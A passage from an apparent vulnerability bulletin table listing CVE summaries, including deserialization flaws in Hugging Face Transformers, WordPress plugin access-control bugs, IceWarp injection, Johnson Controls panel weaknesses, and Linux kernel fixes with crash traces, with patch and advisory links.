| Hugging Face--Transformers | Hugging Face Transformers X-CLIP Checkpoint Conversion Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Transformers. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of checkpoints. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28308. | 2025-12-23 | not yet calculated | CVE-2025-14929 | ZDI-25-1144 |
| Hugging Face--Transformers | Hugging Face Transformers GLM4 Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Transformers. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of weights. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28309. | 2025-12-23 | not yet calculated | CVE-2025-14930 | ZDI-25-1145 |
| icc0rz--H5P | Missing Authorization vulnerability in icc0rz H5P h5p allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects H5P: from n/a through <= 1.16.1. | 2025-12-24 | not yet calculated | CVE-2025-68505 | https://vdp.patchstack.com/database/Wordpress/Plugin/h5p/vulnerability/wordpress-h5p-plugin-1-16-1-broken-access-control-vulnerability?_s_id=cve |
| Icegram--Icegram Express Pro | Deserialization of Untrusted Data vulnerability in Icegram Icegram Express Pro email-subscribers-premium allows Object Injection. This issue affects Icegram Express Pro: from n/a through <= 5.9.11. | 2025-12-24 | not yet calculated | CVE-2025-68038 | https://vdp.patchstack.com/database/Wordpress/Plugin/email-subscribers-premium/vulnerability/wordpress-icegram-express-pro-plugin-5-9-11-php-object-injection-vulnerability?_s_id=cve |
| IceWarp--IceWarp | IceWarp gmaps Cross-Site Scripting Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of IceWarp. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of a parameter passed to the gmaps webpage. The issue results from the lack of proper validation of user-supplied data, which can lead to the injection of an arbitrary script. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-25441. | 2025-12-23 | not yet calculated | CVE-2025-14499 | ZDI-25-1071 vendor-provided URL |
| IceWarp--IceWarp | IceWarp14 X-File-Operation Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IceWarp. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the X-File-Operation header. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-27394. | 2025-12-23 | not yet calculated | CVE-2025-14500 | ZDI-25-1072 |
| integrationclaspo--Popup Builder: Exit-Intent pop-up, Spin the Wheel, Newsletter signup, Email Capture & Lead Generation forms maker | Missing Authorization vulnerability in integrationclaspo Popup Builder: Exit-Intent pop-up, Spin the Wheel, Newsletter signup, Email Capture & Lead Generation forms maker claspo allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Popup Builder: Exit-Intent pop-up, Spin the Wheel, Newsletter signup, Email Capture & Lead Generation forms maker: from n/a through <= 1.0.5. | 2025-12-24 | not yet calculated | CVE-2025-68568 | https://vdp.patchstack.com/database/Wordpress/Plugin/claspo/vulnerability/wordpress-popup-builder-exit-intent-pop-up-spin-the-wheel-newsletter-signup-email-capture-lead-generation-forms-maker-plugin-1-0-5-broken-access-control-vulnerability?_s_id=cve |
| JayBee--Twitch Player | Missing Authorization vulnerability in JayBee Twitch Player ttv-easy-embed-player allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Twitch Player: from n/a through <= 2.1.3. | 2025-12-24 | not yet calculated | CVE-2025-68565 | https://vdp.patchstack.com/database/Wordpress/Plugin/ttv-easy-embed-player/vulnerability/wordpress-twitch-player-plugin-2-1-3-broken-access-control-vulnerability?_s_id=cve |
| Jeff Starr--User Submitted Posts | URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Jeff Starr User Submitted Posts user-submitted-posts allows Phishing. This issue affects User Submitted Posts: from n/a through <= 20251121. | 2025-12-24 | not yet calculated | CVE-2025-68509 | https://vdp.patchstack.com/database/Wordpress/Plugin/user-submitted-posts/vulnerability/wordpress-user-submitted-posts-plugin-20251121-open-redirection-vulnerability?_s_id=cve |
| Jegstudio--Gutenverse Form | Missing Authorization vulnerability in Jegstudio Gutenverse Form gutenverse-form allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Gutenverse Form: from n/a through <= 2.3.1. | 2025-12-24 | not yet calculated | CVE-2025-68511 | https://vdp.patchstack.com/database/Wordpress/Plugin/gutenverse-form/vulnerability/wordpress-gutenverse-form-plugin-2-3-1-broken-access-control-vulnerability?_s_id=cve |
| jnunemaker--httparty | httparty is an API tool. In versions 0.23.2 and prior, httparty is vulnerable to SSRF. This issue can pose a risk of leaking API keys, and it can also allow third parties to issue requests to internal servers. This issue has been patched via commit 0529bcd. | 2025-12-23 | not yet calculated | CVE-2025-68696 | https://github.com/jnunemaker/httparty/security/advisories/GHSA-hm5p-x4rq-38w4 https://github.com/jnunemaker/httparty/commit/0529bcd6309c9fd9bfdd50ae211843b10054c240 |
| Johnson Controls--IQ Panels2, 2+, IQHub, IQPanel 4, PowerG | Use of a weak pseudo-random number generator, which may allow an attacker to read or inject encrypted PowerG packets. | 2025-12-22 | not yet calculated | CVE-2025-26379 | https://www.johnsoncontrols.com/trust-center/cybersecurity/security-advisories https://www.cisa.gov/news-events/ics-advisories/icsa-25-350-02 |
| Johnson Controls--IQ Panels2, 2+, IQHub, IQPanel 4, PowerG | Due to Nonce reuse, attackers can perform reply attack or decrypt captured packets. | 2025-12-22 | not yet calculated | CVE-2025-61739 | https://www.johnsoncontrols.com/trust-center/cybersecurity/security-advisories https://www.cisa.gov/news-events/ics-advisories/icsa-25-350-02 |
| Johnson Controls--IQ Panels2, 2+, IQHub, IQPanel 4, PowerG | Authentication issue that does not verify the source of a packet which could allow an attacker to create a denial-of-service condition or modify the configuration of the device. | 2025-12-22 | not yet calculated | CVE-2025-61740 | https://www.johnsoncontrols.com/trust-center/cybersecurity/security-advisories https://www.cisa.gov/news-events/ics-advisories/icsa-25-350-02 |
| Johnson Controls--IQPanel2, IQHub,IQPanel2+,IQPanel 4,PowerG | Under certain circumstances, attacker can capture the network key, read or write encrypted packets on the PowerG network. | 2025-12-22 | not yet calculated | CVE-2025-61738 | https://www.cisa.gov/news-events/ics-advisories/icsa-25-350-02 https://www.johnsoncontrols.com/trust-center/cybersecurity/security-advisories |
| Johnson Controls--iSTAR Ultra, iSTAR Ultra SE | Under certain circumstances a successful exploitation could result in access to the device. | 2025-12-24 | not yet calculated | CVE-2025-43875 | https://www.johnsoncontrols.com/trust-center/cybersecurity/security-advisories https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-01 |
| Johnson Controls--iSTAR Ultra, iSTAR Ultra SE | Under certain circumstances a successful exploitation could result in access to the device. | 2025-12-24 | not yet calculated | CVE-2025-43876 | https://www.johnsoncontrols.com/trust-center/cybersecurity/security-advisories https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-01 |
| kedacore--keda | KEDA is a Kubernetes-based Event Driven Autoscaling component. Prior to versions 2.17.3 and 2.18.3, an Arbitrary File Read vulnerability has been identified in KEDA, potentially affecting any KEDA resource that uses TriggerAuthentication to configure HashiCorp Vault authentication. The vulnerability stems from an incorrect or insufficient path validation when loading the Service Account Token specified in spec.hashiCorpVault.credential.serviceAccount. An attacker with permissions to create or modify a TriggerAuthentication resource can exfiltrate the content of any file from the node's filesystem (where the KEDA pod resides) by directing the file's content to a server under their control, as part of the Vault authentication request. The potential impact includes the exfiltration of sensitive system information, such as secrets, keys, or the content of files like /etc/passwd. This issue has been patched in versions 2.17.3 and 2.18.3. | 2025-12-22 | not yet calculated | CVE-2025-68476 | https://github.com/kedacore/keda/security/advisories/GHSA-c4p6-qg4m-9jmr https://github.com/kedacore/keda/commit/15c5677f65f809b9b6b59a52f4cf793db0a510fd |
| Kodezen LLC--Academy LMS | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kodezen LLC Academy LMS academy allows Stored XSS. This issue affects Academy LMS: from n/a through <= 3.4.0. | 2025-12-24 | not yet calculated | CVE-2025-68527 | https://vdp.patchstack.com/database/Wordpress/Plugin/academy/vulnerability/wordpress-academy-lms-plugin-3-4-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Leap13--Premium Addons for Elementor | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Leap13 Premium Addons for Elementor premium-addons-for-elementor allows Retrieve Embedded Sensitive Data. This issue affects Premium Addons for Elementor: from n/a through <= 4.11.53. | 2025-12-24 | not yet calculated | CVE-2025-68494 | https://vdp.patchstack.com/database/Wordpress/Plugin/premium-addons-for-elementor/vulnerability/wordpress-premium-addons-for-elementor-plugin-4-11-53-sensitive-data-exposure-vulnerability?_s_id=cve |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mrp: introduce active flags to prevent UAF when applicant uninit The caller of del_timer_sync must prevent restarting of the timer, If we have no this synchronization, there is a small probability that the cancellation will not be successful. And syzbot report the fellowing crash: ================================================================== BUG: KASAN: use-after-free in hlist_add_head include/linux/list.h:929 [inline] BUG: KASAN: use-after-free in enqueue_timer+0x18/0xa4 kernel/time/timer.c:605 Write at addr f9ff000024df6058 by task syz-fuzzer/2256 Pointer tag: [f9], memory tag: [fe] CPU: 1 PID: 2256 Comm: syz-fuzzer Not tainted 6.1.0-rc5-syzkaller-00008- ge01d50cbd6ee #0 Hardware name: linux,dummy-virt (DT) Call trace: dump_backtrace.part.0+0xe0/0xf0 arch/arm64/kernel/stacktrace.c:156 dump_backtrace arch/arm64/kernel/stacktrace.c:162 [inline] show_stack+0x18/0x40 arch/arm64/kernel/stacktrace.c:163 __dump_stack lib/dump_stack.c:88 [inline] dump_stack_lvl+0x68/0x84 lib/dump_stack.c:106 print_address_description mm/kasan/report.c:284 [inline] print_report+0x1a8/0x4a0 mm/kasan/report.c:395 kasan_report+0x94/0xb4 mm/kasan/report.c:495 __do_kernel_fault+0x164/0x1e0 arch/arm64/mm/fault.c:320 do_bad_area arch/arm64/mm/fault.c:473 [inline] do_tag_check_fault+0x78/0x8c arch/arm64/mm/fault.c:749 do_mem_abort+0x44/0x94 arch/arm64/mm/fault.c:825 el1_abort+0x40/0x60 arch/arm64/kernel/entry-common.c:367 el1h_64_sync_handler+0xd8/0xe4 arch/arm64/kernel/entry-common.c:427 el1h_64_sync+0x64/0x68 arch/arm64/kernel/entry.S:576 hlist_add_head include/linux/list.h:929 [inline] enqueue_timer+0x18/0xa4 kernel/time/timer.c:605 mod_timer+0x14/0x20 kernel/time/timer.c:1161 mrp_periodic_timer_arm net/802/mrp.c:614 [inline] mrp_periodic_timer+0xa0/0xc0 net/802/mrp.c:627 call_timer_fn.constprop.0+0x24/0x80 kernel/time/timer.c:1474 expire_timers+0x98/0xc4 kernel/time/timer.c:1519 To fix it, we can introduce a new active flags to make sure the timer will not restart. | 2025-12-24 | not yet calculated | CVE-2022-50697 | https://git.kernel.org/stable/c/98f53e591940e4c3818be358c5dc684d5b30cb56 https://git.kernel.org/stable/c/aacffc1a8dbf67c5463cb4f67b37143c01ca6fa9 https://git.kernel.org/stable/c/78d48bc41f7726113c9f114268d3ab11212814da https://git.kernel.org/stable/c/aadb1507a77b060c529edfeaf67f803e31461f24 https://git.kernel.org/stable/c/755eb0879224ffc2a43de724554aeaf0e51e5a64 https://git.kernel.org/stable/c/5d5a481a7fd0234f617535dc464ea010804a1129 https://git.kernel.org/stable/c/1a185fe83c2a60c1e3596fb9d82dbeb148dc09c6 https://git.kernel.org/stable/c/563e45fd5046045cc194af3ba17f5423e1c98170 https://git.kernel.org/stable/c/ab0377803dafc58f1e22296708c1c28e309414d6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: da7219: Fix an error handling path in da7219_register_dai_clks() If clk_hw_register() fails, the corresponding clk should not be unregistered. To handle errors from loops, clean up partial iterations before doing the goto. So add a clk_hw_unregister(). Then use a while (--i >= 0) loop in the unwind section. | 2025-12-24 | not yet calculated | CVE-2022-50698 | https://git.kernel.org/stable/c/4993c1511d66326f1037bc5156b024a6a96d23ef https://git.kernel.org/stable/c/f5f1f5ee5048cfa7bd07f496b33bd2cfc198a176 https://git.kernel.org/stable/c/ec692f0b51006de1138cd1f82cae625f0d2888d1 https://git.kernel.org/stable/c/cefce8bee0e988f9a005fe40705b98a25cfb7f9d https://git.kernel.org/stable/c/abb4e4349afe7eecdb0499582f1c777031e3a7c8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: selinux: enable use of both GFP_KERNEL and GFP_ATOMIC in convert_context() The following warning was triggered on a hardware environment: SELinux: Converting 162 SID table entries... BUG: sleeping function called from invalid context at __might_sleep+0x60/0x74 0x0 in_atomic(): 1, irqs_disabled(): 128, non_block: 0, pid: 5943, name: tar CPU: 7 PID: 5943 Comm: tar Tainted: P O 5.10.0 #1 Call trace: dump_backtrace+0x0/0x1c8 show_stack+0x18/0x28 dump_stack+0xe8/0x15c ___might_sleep+0x168/0x17c __might_sleep+0x60/0x74 __kmalloc_track_caller+0xa0/0x7dc kstrdup+0x54/0xac convert_context+0x48/0x2e4 sidtab_context_to_sid+0x1c4/0x36c security_context_to_sid_core+0x168/0x238 security_context_to_sid_default+0x14/0x24 inode_doinit_use_xattr+0x164/0x1e4 inode_doinit_with_dentry+0x1c0/0x488 selinux_d_instantiate+0x20/0x34 security_d_instantiate+0x70/0xbc d_splice_alias+0x4c/0x3c0 ext4_lookup+0x1d8/0x200 [ext4] __lookup_slow+0x12c/0x1e4 walk_component+0x100/0x200 path_lookupat+0x88/0x118 filename_lookup+0x98/0x130 user_path_at_empty+0x48/0x60 vfs_statx+0x84/0x140 vfs_fstatat+0x20/0x30 __se_sys_newfstatat+0x30/0x74 __arm64_sys_newfstatat+0x1c/0x2c el0_svc_common.constprop.0+0x100/0x184 do_el0_svc+0x1c/0x2c el0_svc+0x20/0x34 el0_sync_handler+0x80/0x17c el0_sync+0x13c/0x140 SELinux: Context system_u:object_r:pssp_rsyslog_log_t:s0:c0 is not valid (left unmapped). It was found that within a critical section of spin_lock_irqsave in sidtab_context_to_sid(), convert_context() (hooked by sidtab_convert_params.func) might cause the process to sleep via allocating memory with GFP_KERNEL, which is problematic. As Ondrej pointed out [1], convert_context()/sidtab_convert_params.func has another caller sidtab_convert_tree(), which is okay with GFP_KERNEL. Therefore, fix this problem by adding a gfp_t argument for convert_context()/sidtab_convert_params.func and pass GFP_KERNEL/_ATOMIC properly in individual callers. [PM: wrap long BUG() output lines, tweak subject line] | 2025-12-24 | not yet calculated | CVE-2022-50699 | https://git.kernel.org/stable/c/2723875e9d677401d775a03a72abab7e9538c20c https://git.kernel.org/stable/c/3006766d247bc93a25b34e92fff2f75bda597e2e https://git.kernel.org/stable/c/277378631d26477451424cc73982b977961f3d8b https://git.kernel.org/stable/c/abe3c631447dcd1ba7af972fe6f054bee6f136fa |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath10k: Delay the unmapping of the buffer On WCN3990, we are seeing a rare scenario where copy engine hardware is sending a copy complete interrupt to the host driver while still processing the buffer that the driver has sent, this is leading into an SMMU fault triggering kernel panic. This is happening on copy engine channel 3 (CE3) where the driver normally enqueues WMI commands to the firmware. Upon receiving a copy complete interrupt, host driver will immediately unmap and frees the buffer presuming that hardware has processed the buffer. In the issue case, upon receiving copy complete interrupt, host driver will unmap and free the buffer but since hardware is still accessing the buffer (which in this case got unmapped in parallel), SMMU hardware will trigger an SMMU fault resulting in a kernel panic. In order to avoid this, as a work around, add a delay before unmapping the copy engine source DMA buffer. This is conditionally done for WCN3990 and only for the CE3 channel where issue is seen. Below is the crash signature: wifi smmu error: kernel: [ 10.120965] arm-smmu 15000000.iommu: Unhandled context fault: fsr=0x402, iova=0x7fdfd8ac0, fsynr=0x500003,cbfrsynra=0xc1, cb=6 arm-smmu 15000000.iommu: Unhandled context fault:fsr=0x402, iova=0x7fe06fdc0, fsynr=0x710003, cbfrsynra=0xc1, cb=6 qcom-q6v5-mss 4080000.remoteproc: fatal error received: err_qdi.c:1040:EF:wlan_process:0x1:WLAN RT:0x2091: cmnos_thread.c:3998:Asserted in copy_engine.c:AXI_ERROR_DETECTED:2149 remoteproc remoteproc0: crash detected in 4080000.remoteproc: type fatal error <3> remoteproc remoteproc0: handling crash #1 in 4080000.remoteproc pc : __arm_lpae_unmap+0x500/0x514 lr : __arm_lpae_unmap+0x4bc/0x514 sp : ffffffc011ffb530 x29: ffffffc011ffb590 x28: 0000000000000000 x27: 0000000000000000 x26: 0000000000000004 x25: 0000000000000003 x24: ffffffc011ffb890 x23: ffffffa762ef9be0 x22: ffffffa77244ef00 x21: 0000000000000009 x20: 00000007fff7c000 x19: 0000000000000003 x18: 0000000000000000 x17: 0000000000000004 x16: ffffffd7a357d9f0 x15: 0000000000000000 x14: 00fd5d4fa7ffffff x13: 000000000000000e x12: 0000000000000000 x11: 00000000ffffffff x10: 00000000fffffe00 x9 : 000000000000017c x8 : 000000000000000c x7 : 0000000000000000 x6 : ffffffa762ef9000 x5 : 0000000000000003 x4 : 0000000000000004 x3 : 0000000000001000 x2 : 00000007fff7c000 x1 : ffffffc011ffb890 x0 : 0000000000000000 Call trace: __arm_lpae_unmap+0x500/0x514 __arm_lpae_unmap+0x4bc/0x514 __arm_lpae_unmap+0x4bc/0x514 arm_lpae_unmap_pages+0x78/0xa4 arm_smmu_unmap_pages+0x78/0x104 __iommu_unmap+0xc8/0x1e4 iommu_unmap_fast+0x38/0x48 __iommu_dma_unmap+0x84/0x104 iommu_dma_free+0x34/0x50 dma_free_attrs+0xa4/0xd0 ath10k_htt_rx_free+0xc4/0xf4 [ath10k_core] ath10k_core_stop+0x64/0x7c [ath10k_core] ath10k_halt+0x11c/0x180 [ath10k_core] ath10k_stop+0x54/0x94 [ath10k_core] drv_stop+0x48/0x1c8 [mac80211] ieee80211_do_open+0x638/0x77c [mac80211] ieee80211_open+0x48/0x5c [mac80211] __dev_open+0xb4/0x174 __dev_change_flags+0xc4/0x1dc dev_change_flags+0x3c/0x7c devinet_ioctl+0x2b4/0x580 inet_ioctl+0xb0/0x1b4 sock_do_ioctl+0x4c/0x16c compat_ifreq_ioctl+0x1cc/0x35c compat_sock_ioctl+0x110/0x2ac __arm64_compat_sys_ioctl+0xf4/0x3e0 el0_svc_common+0xb4/0x17c el0_svc_compat_handler+0x2c/0x58 el0_svc_compat+0x8/0x2c Tested-on: WCN3990 hw1.0 SNOC WLAN.HL.2.0-01387-QCAHLSWMTPLZ-1 | 2025-12-24 | not yet calculated | CVE-2022-50700 | https://git.kernel.org/stable/c/c4bedc3cda09d896c92adcdb6b62aa93b0c47a8a https://git.kernel.org/stable/c/79a124b588aadb5a22695542778de14366ff3219 https://git.kernel.org/stable/c/acd4324e5f1f11351630234297f95076f0ac9a2f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: mt76: mt7921s: fix slab-out-of-bounds access in sdio host SDIO may need addtional 511 bytes to align bus operation. If the tailroom of this skb is not big enough, we would access invalid memory region. For low level operation, increase skb size to keep valid memory access in SDIO host. Error message: [69.951] BUG: KASAN: slab-out-of-bounds in sg_copy_buffer+0xe9/0x1a0 [69.951] Read of size 64 at addr ffff88811c9cf000 by task kworker/u16:7/451 [69.951] CPU: 4 PID: 451 Comm: kworker/u16:7 Tainted: G W OE 6.1.0-rc5 #1 [69.951] Workqueue: kvub300c vub300_cmndwork_thread [vub300] [69.951] Call Trace: [69.951] <TASK> [69.952] dump_stack_lvl+0x49/0x63 [69.952] print_report+0x171/0x4a8 [69.952] kasan_report+0xb4/0x130 [69.952] kasan_check_range+0x149/0x1e0 [69.952] memcpy+0x24/0x70 [69.952] sg_copy_buffer+0xe9/0x1a0 [69.952] sg_copy_to_buffer+0x12/0x20 [69.952] __command_write_data.isra.0+0x23c/0xbf0 [vub300] [69.952] vub300_cmndwork_thread+0x17f3/0x58b0 [vub300] [69.952] process_one_work+0x7ee/0x1320 [69.952] worker_thread+0x53c/0x1240 [69.952] kthread+0x2b8/0x370 [69.952] ret_from_fork+0x1f/0x30 [69.952] </TASK> [69.952] Allocated by task 854: [69.952] kasan_save_stack+0x26/0x50 [69.952] kasan_set_track+0x25/0x30 [69.952] kasan_save_alloc_info+0x1b/0x30 [69.952] __kasan_kmalloc+0x87/0xa0 [69.952] __kmalloc_node_track_caller+0x63/0x150 [69.952] kmalloc_reserve+0x31/0xd0 [69.952] __alloc_skb+0xfc/0x2b0 [69.952] __mt76_mcu_msg_alloc+0xbf/0x230 [mt76] [69.952] mt76_mcu_send_and_get_msg+0xab/0x110 [mt76] [69.952] __mt76_mcu_send_firmware.cold+0x94/0x15d [mt76] [69.952] mt76_connac_mcu_send_ram_firmware+0x415/0x54d [mt76_connac_lib] [69.952] mt76_connac2_load_ram.cold+0x118/0x4bc [mt76_connac_lib] [69.952] mt7921_run_firmware.cold+0x2e9/0x405 [mt7921_common] [69.952] mt7921s_mcu_init+0x45/0x80 [mt7921s] [69.953] mt7921_init_work+0xe1/0x2a0 [mt7921_common] [69.953] process_one_work+0x7ee/0x1320 [69.953] worker_thread+0x53c/0x1240 [69.953] kthread+0x2b8/0x370 [69.953] ret_from_fork+0x1f/0x30 [69.953] The buggy address belongs to the object at ffff88811c9ce800 which belongs to the cache kmalloc-2k of size 2048 [69.953] The buggy address is located 0 bytes to the right of 2048-byte region [ffff88811c9ce800, ffff88811c9cf000) [69.953] Memory state around the buggy address: [69.953] ffff88811c9cef00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [69.953] ffff88811c9cef80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [69.953] >ffff88811c9cf000: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc [69.953] ^ [69.953] ffff88811c9cf080: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc [69.953] ffff88811c9cf100: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc | 2025-12-24 | not yet calculated | CVE-2022-50701 | https://git.kernel.org/stable/c/8b5174a7f25d03df0ffa171ff86de383a89e8e89 https://git.kernel.org/stable/c/0b358e36433d2c46a65488a146bf8b4623fc5bbb https://git.kernel.org/stable/c/aec4cf2ea0797e28f18f8dbe01943a56d987fe56 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: vdpa_sim: fix possible memory leak in vdpasim_net_init() and vdpasim_blk_init() Inject fault while probing module, if device_register() fails in vdpasim_net_init() or vdpasim_blk_init(), but the refcount of kobject is not decreased to 0, the name allocated in dev_set_name() is leaked. Fix this by calling put_device(), so that name can be freed in callback function kobject_cleanup(). (vdpa_sim_net) unreferenced object 0xffff88807eebc370 (size 16): comm "modprobe", pid 3848, jiffies 4362982860 (age 18.153s) hex dump (first 16 bytes): 76 64 70 61 73 69 6d 5f 6e 65 74 00 6b 6b 6b a5 vdpasim_net.kkk. backtrace: [<ffffffff8174f19e>] __kmalloc_node_track_caller+0x4e/0x150 [<ffffffff81731d53>] kstrdup+0x33/0x60 [<ffffffff83a5d421>] kobject_set_name_vargs+0x41/0x110 [<ffffffff82d87aab>] dev_set_name+0xab/0xe0 [<ffffffff82d91a23>] device_add+0xe3/0x1a80 [<ffffffffa0270013>] 0xffffffffa0270013 [<ffffffff81001c27>] do_one_initcall+0x87/0x2e0 [<ffffffff813739cb>] do_init_module+0x1ab/0x640 [<ffffffff81379d20>] load_module+0x5d00/0x77f0 [<ffffffff8137bc40>] __do_sys_finit_module+0x110/0x1b0 [<ffffffff83c4d505>] do_syscall_64+0x35/0x80 [<ffffffff83e0006a>] entry_SYSCALL_64_after_hwframe+0x46/0xb0 (vdpa_sim_blk) unreferenced object 0xffff8881070c1250 (size 16): comm "modprobe", pid 6844, jiffies 4364069319 (age 17.572s) hex dump (first 16 bytes): 76 64 70 61 73 69 6d 5f 62 6c 6b 00 6b 6b 6b a5 vdpasim_blk.kkk. backtrace: [<ffffffff8174f19e>] __kmalloc_node_track_caller+0x4e/0x150 [<ffffffff81731d53>] kstrdup+0x33/0x60 [<ffffffff83a5d421>] kobject_set_name_vargs+0x41/0x110 [<ffffffff82d87aab>] dev_set_name+0xab/0xe0 [<ffffffff82d91a23>] device_add+0xe3/0x1a80 [<ffffffffa0220013>] 0xffffffffa0220013 [<ffffffff81001c27>] do_one_initcall+0x87/0x2e0 [<ffffffff813739cb>] do_init_module+0x1ab/0x640 [<ffffffff81379d20>] load_module+0x5d00/0x77f0 [<ffffffff8137bc40>] __do_sys_finit_module+0x110/0x1b0 [<ffffffff83c4d505>] do_syscall_64+0x35/0x80 [<ffffffff83e0006a>] entry_SYSCALL_64_after_hwframe+0x46/0xb0 | 2025-12-24 | not yet calculated | CVE-2022-50702 | https://git.kernel.org/stable/c/586e6fd7d581f987f7d0d2592edf0b26397e783e https://git.kernel.org/stable/c/5be953e353fe421f2983e1fd37f07fba97edbffc https://git.kernel.org/stable/c/337c24d817e28dd454ca22f1063dfad20822426e https://git.kernel.org/stable/c/aeca7ff254843d49a8739f07f7dab1341450111d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: soc: qcom: smsm: Fix refcount leak bugs in qcom_smsm_probe() There are two refcount leak bugs in qcom_smsm_probe(): (1) The 'local_node' is escaped out from for_each_child_of_node() as the break of iteration, we should call of_node_put() for it in error path or when it is not used anymore. (2) The 'node' is escaped out from for_each_available_child_of_node() as the 'goto', we should call of_node_put() for it in goto target. | 2025-12-24 | not yet calculated | CVE-2022-50703 | https://git.kernel.org/stable/c/1bbe75d466e5118b7d49ef4a346c3ce5742da4e8 https://git.kernel.org/stable/c/bd4666bf5562fe8e8e5e9bd6fc805d30e1767f43 https://git.kernel.org/stable/c/42df28994eba7b56c762f7bbe7efd5611a1cd15b https://git.kernel.org/stable/c/1e3ed59370c712df436791efed120f0c082aa9bc https://git.kernel.org/stable/c/39781c98ad46b4e85053345dff797240c1ed7935 https://git.kernel.org/stable/c/96e0028debdd07a6d582f0dfadf9a3ec2b5fffff https://git.kernel.org/stable/c/8fb6112bd49c0e49f2cf51604231d85ff00284bb https://git.kernel.org/stable/c/ee7fc83ce0e6986ff9b1c1d7e994fbbf8d43861d https://git.kernel.org/stable/c/af8f6f39b8afd772fda4f8e61823ef8c021bf382 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: USB: gadget: Fix use-after-free during usb config switch In the process of switching USB config from rndis to other config, if the hardware does not support the ->pullup callback, or the hardware encounters a low probability fault, both of them may cause the ->pullup callback to fail, which will then cause a system panic (use after free). The gadget drivers sometimes need to be unloaded regardless of the hardware's behavior. Analysis as follows: ======================================================================= (1) write /config/usb_gadget/g1/UDC "none" gether_disconnect+0x2c/0x1f8 rndis_disable+0x4c/0x74 composite_disconnect+0x74/0xb0 configfs_composite_disconnect+0x60/0x7c usb_gadget_disconnect+0x70/0x124 usb_gadget_unregister_driver+0xc8/0x1d8 gadget_dev_desc_UDC_store+0xec/0x1e4 (2) rm /config/usb_gadget/g1/configs/b.1/f1 rndis_deregister+0x28/0x54 rndis_free+0x44/0x7c usb_put_function+0x14/0x1c config_usb_cfg_unlink+0xc4/0xe0 configfs_unlink+0x124/0x1c8 vfs_unlink+0x114/0x1dc (3) rmdir /config/usb_gadget/g1/functions/rndis.gs4 panic+0x1fc/0x3d0 do_page_fault+0xa8/0x46c do_mem_abort+0x3c/0xac el1_sync_handler+0x40/0x78 0xffffff801138f880 rndis_close+0x28/0x34 eth_stop+0x74/0x110 dev_close_many+0x48/0x194 rollback_registered_many+0x118/0x814 unregister_netdev+0x20/0x30 gether_cleanup+0x1c/0x38 rndis_attr_release+0xc/0x14 kref_put+0x74/0xb8 configfs_rmdir+0x314/0x374 If gadget->ops->pullup() return an error, function rndis_close() will be called, then it will causes a use-after-free problem. ======================================================================= | 2025-12-24 | not yet calculated | CVE-2022-50704 | https://git.kernel.org/stable/c/30e926aa835ac2e6ad05822e4cb75833feb0d99f https://git.kernel.org/stable/c/99a58ac42d9b6911834b0224b6782aea0c311346 https://git.kernel.org/stable/c/afdc12887f2b2ecf20d065a7d81ad29824155083 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: io_uring/rw: defer fsnotify calls to task context We can't call these off the kiocb completion as that might be off soft/hard irq context. Defer the calls to when we process the task_work for this request. That avoids valid complaints like: stack backtrace: CPU: 1 PID: 0 Comm: swapper/1 Not tainted 6.0.0-rc6-syzkaller-00321-g105a36f3694e #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 08/26/2022 Call Trace: <IRQ> __dump_stack lib/dump_stack.c:88 [inline] dump_stack_lvl+0xcd/0x134 lib/dump_stack.c:106 print_usage_bug kernel/locking/lockdep.c:3961 [inline] valid_state kernel/locking/lockdep.c:3973 [inline] mark_lock_irq kernel/locking/lockdep.c:4176 [inline] mark_lock.part.0.cold+0x18/0xd8 kernel/locking/lockdep.c:4632 mark_lock kernel/locking/lockdep.c:4596 [inline] mark_usage kernel/locking/lockdep.c:4527 [inline] __lock_acquire+0x11d9/0x56d0 kernel/locking/lockdep.c:5007 lock_acquire kernel/locking/lockdep.c:5666 [inline] lock_acquire+0x1ab/0x570 kernel/locking/lockdep.c:5631 __fs_reclaim_acquire mm/page_alloc.c:4674 [inline] fs_reclaim_acquire+0x115/0x160 mm/page_alloc.c:4688 might_alloc include/linux/sched/mm.h:271 [inline] 